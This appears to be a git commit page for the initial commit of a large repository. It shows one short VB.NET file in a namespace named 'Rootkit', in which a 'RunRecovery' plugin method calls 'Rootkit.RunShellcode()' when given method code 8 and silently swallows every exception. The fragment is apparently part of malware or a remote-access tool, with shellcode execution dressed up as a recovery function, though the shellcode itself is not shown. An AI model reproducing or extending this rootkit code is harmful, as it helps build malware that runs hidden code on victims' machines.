initial commit

This commit is contained in:
i2p
2026-08-27 11:22:34 -06:00
commit 5983c713b1
2676 changed files with 529190 additions and 0 deletions
+20
View File
@@ -0,0 +1,20 @@
Imports System
Imports Microsoft.VisualBasic
Namespace Rootkit
Public Class Plugin
Public Shared Function RunRecovery(Method As Integer) As String
Dim text As String
Try
Select Case Method
Case 8
Rootkit.RunShellcode()
End Select
text = Nothing
Catch ex As Exception
text = Nothing
End Try
Return text
End Function
End Class
End Namespace